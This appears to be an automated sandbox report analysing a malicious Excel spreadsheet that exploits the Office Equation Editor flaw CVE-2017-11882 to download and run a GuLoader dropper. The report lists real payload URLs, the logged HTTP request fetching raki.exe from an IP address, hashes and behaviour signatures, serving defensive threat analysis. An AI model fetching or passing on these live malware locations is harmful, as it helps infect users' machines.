
Windows Analysis Report
7027521.xlsx

Overview

General Information

Sample Name:7027521.xlsx
Analysis ID:560280
MD5:e96baf78f2a98321ae47d4d82e608124
SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
Tags:VelvetSweatshopxlsx

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 584 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1352 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 800 cmdline: "C:\Users\Public\vbc.exe" MD5: 0DCB37FF90B93B7A3225707B1AF111B8)
  • cleanup
Malware configuration (GuLoader): {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security

    Exploits

    Source: Network Connection; Author: Joe Security; Data: DestinationIp: 50.16.4.125, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe

    System Summary

    Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1352, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 800


    AV Detection

    Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
    Source: 7027521.xlsx; Virustotal: Detection: 48%
    Source: 7027521.xlsx; Metadefender: Detection: 23%
    Source: 7027521.xlsx; ReversingLabs: Detection: 44%
    Source: http://50.16.4.125/E/raki.exe; Avira URL Cloud: Label: malware
    Source: http://50.16.4.125/E/raki.exe; Virustotal: Detection: 9%

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040290B FindFirstFileW,
    Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80
    Source: excel.exe; Memory has grown: Private usage: 4MB later: 60MB

    Networking

    Source: Malware configuration extractor; URLs: https://dariamob.ro/wed/eee_XScUCMEVL47.
    Source: Joe Sandbox View; ASN Name: AMAZON-AESUS
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 26 Jan 2022 09:40:54 GMT; Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14; Last-Modified: Wed, 26 Jan 2022 04:12:20 GMT; ETag: "29888-5d6746870006c"; Accept-Ranges: bytes; Content-Length: 170120; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
    Source: global traffic; HTTP traffic detected: GET /E/raki.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 50.16.4.125; Connection: Keep-Alive
    Source: unknown; TCP traffic detected without corresponding DNS query: 50.16.4.125 (50 identical entries in the report)
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://ocsp.digicert.com0O
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe.2.dr, raki[1].exe.2.dr; String found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emf
    Source: global traffic; HTTP traffic detected: GET /E/raki.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 50.16.4.125; Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040755C
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_00406D85
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_73191BFF
    Source: C:\Users\Public\vbc.exe; Process Stats: CPU usage > 98%
    Source: raki[1].exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe; Memory allocated: 76E90000 page execute and read and write
    Source: 7027521.xlsx; Virustotal: Detection: 48%
    Source: 7027521.xlsx; Metadefender: Detection: 23%
    Source: 7027521.xlsx; ReversingLabs: Detection: 44%
    Source: C:\Users\Public\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$7027521.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRE8A9.tmp
    Source: classification engine; Classification label: mal100.troj.expl.winXLSX@4/24@0/1
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_004021AA CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

    Data Obfuscation

    Source: Yara match; File source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_731930C0 push eax; ret
    Source: secur32.dll.4.dr; Static PE information: section name: .didat
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: secur32.dll.4.dr; Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe
    Source: C:\Users\Public\vbc.exe; File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe; File created: C:\Users\user\AppData\Local\Temp\secur32.dll
    Source: C:\Users\Public\vbc.exe; File created: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll

    Boot Survival

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (10 identical entries in the report)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX (8 identical entries in the report)
    Source: C:\Users\Public\vbc.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2584; Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_00406873 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040290B FindFirstFileW,
    Source: C:\Users\Public\vbc.exe; API call chain: ExitProcess graph end node
    Source: vbc.exe, 00000004.00000002.680174022.00000000005CF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    MITRE ATT&CK Matrix (rebuilt from the flattened table, listed per tactic column; the numbers in brackets are the detection-count badges as they appear in the report):

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Native API [1]; Exploitation for Client Execution [12]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Privilege Escalation: Access Token Manipulation [1]; Process Injection [11]; Extra Window Memory Injection [1]; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Defense Evasion: Masquerading [111]; Virtualization/Sandbox Evasion [1]; Access Token Manipulation [1]; Process Injection [11]; Obfuscated Files or Information [1]; Timestomp [1]; Extra Window Memory Injection [1]
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: Security Software Discovery [1]; Virtualization/Sandbox Evasion [1]; Remote System Discovery [1]; File and Directory Discovery [2]; System Information Discovery [4]; System Owner/User Discovery; Network Sniffing
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: Archive Collected Data [1]; Clipboard Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [12]; Non-Application Layer Protocol [1]; Application Layer Protocol [121]; Fallback Channels; Multiband Communication; Commonly Used Port
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
    Source | Detection | Scanner | Label
    7027521.xlsx | 48% | Virustotal | -
    7027521.xlsx | 24% | Metadefender | -
    7027521.xlsx | 44% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe | 3% | Virustotal | -
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll | 0% | Virustotal | -
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll | 0% | Metadefender | -
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll | 0% | ReversingLabs | -
    C:\Users\user\AppData\Local\Temp\secur32.dll | 0% | Metadefender | -
    C:\Users\user\AppData\Local\Temp\secur32.dll | 0% | ReversingLabs | -
    C:\Users\user\AppData\Local\Temp\sxsstore.dll | 0% | Metadefender | -
    C:\Users\user\AppData\Local\Temp\sxsstore.dll | 0% | ReversingLabs | -
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://50.16.4.125/E/raki.exe | 10% | Virustotal | -
    http://50.16.4.125/E/raki.exe | 100% | Avira URL Cloud | malware
    https://dariamob.ro/wed/eee_XScUCMEVL47. | 0% | Avira URL Cloud | safe
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://50.16.4.125/E/raki.exe | true | Virustotal: 10%; Avira URL Cloud: malware | unknown
    https://dariamob.ro/wed/eee_XScUCMEVL47. | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr | false | - | high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IP | Domain | Country | ASN | ASN Name | Malicious
      50.16.4.125 | unknown | United States | 14618 | AMAZON-AESUS | true
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:560280
      Start date:26.01.2022
      Start time:10:39:37
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 47s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:7027521.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.winXLSX@4/24@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 63.2% (good quality ratio 61.9%)
      • Quality average: 88.3%
      • Quality standard deviation: 21%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • TCP Packets have been reduced to 100
      Time | Type | Description
      10:40:43 | API Interceptor | 56x Sleep call for process: EQNEDT32.EXE modified
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:downloaded
      Size (bytes):170120
      Entropy (8bit):7.49730405573374
      Encrypted:false
      SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
      MD5:0DCB37FF90B93B7A3225707B1AF111B8
      SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
      SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
      SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
      Malicious:true
      Antivirus:
      • Antivirus: Virustotal, Detection: 3%, Browse
      Reputation:low
      IE Cache URL:http://50.16.4.125/E/raki.exe
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):1099960
      Entropy (8bit):2.0153934122762553
      Encrypted:false
      SSDEEP:3072:ZXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:3ahIFdyiaT2qtXl
      MD5:D6822083BFFC8F231A49532F07C2912A
      SHA1:7DFEB1E76C379822A45B7A22B3049479485A8AAF
      SHA-256:3BF445DA5FFB7F79F35705E01D731098AAF6FEC17EBE16BB20C88E232FC5AA90
      SHA-512:1E296BBE0841CD7968C67CC9F3DF873F75735B5E6FECBC55141D782E8277CB98DC12E0B0FB9EC556E5067F3815AB1E232B2F0CD5D1497D8D4860CEBD67158119
      Malicious:false
      Reputation:low
      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................[V$...H....feV.@..%...$...h...........L...RQ.W............4.......$Q.W........ ...IdeV........ ............deV........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........X...X............8]V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5396
      Entropy (8bit):7.915293088075047
      Encrypted:false
      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):3747
